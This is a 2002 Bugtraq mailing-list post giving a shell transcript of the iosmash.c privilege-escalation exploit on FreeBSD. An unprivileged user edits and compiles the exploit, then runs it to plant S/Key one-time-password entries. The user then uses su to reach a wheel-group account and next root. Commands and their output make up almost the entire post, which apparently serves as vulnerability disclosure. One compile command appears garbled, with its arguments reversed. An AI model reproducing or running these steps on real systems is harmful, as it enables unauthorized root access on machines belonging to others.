full info on iosmash.c as non wheel user

From: John Scimone (jscimone@cc.gatech.edu)
Date: 04/24/02


From: John Scimone <jscimone@cc.gatech.edu>
To: bugtraq@securityfocus.com
Date: Tue, 23 Apr 2002 22:25:36 +0000

from phased....

I didnt think such would be necessary but due to the high volume of emails it
has proved so, below is a transcript of exploiting the stdio bug on freebsd as
a user not in the wheel group

Welcome to FreeBSD!
> id
uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
>
> grep wheel /etc/group
wheel:*:0:root,akt0r-root,misterx
>
> perl -pi -e 's/root /misterx /g' iosmash.c
> gcc -o iosmash.c iosmash
>./iosmash
Adding d0tslash:
<--- HIT CTRL-C --->
> grep 98 iosmash.c
  s/key 98 snosoft2
  98: MASS OAT ROLL TOOL AGO CAM
        "\nmisterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666
01:02:0
3\n");
> su misterx
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
%pwd
/usr/home/d0tslash
%id
uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel),
1006(cvsusers)
%cd ~
%grep "root " iosmash.c
  decided to make a trivial exploit to easily get root :)
        "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
%gcc -o iosmash iosmash.c
%./iosmash
Updating misterx:
Old key: snosoft2
<--- HIT CTRL-C --->
%su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#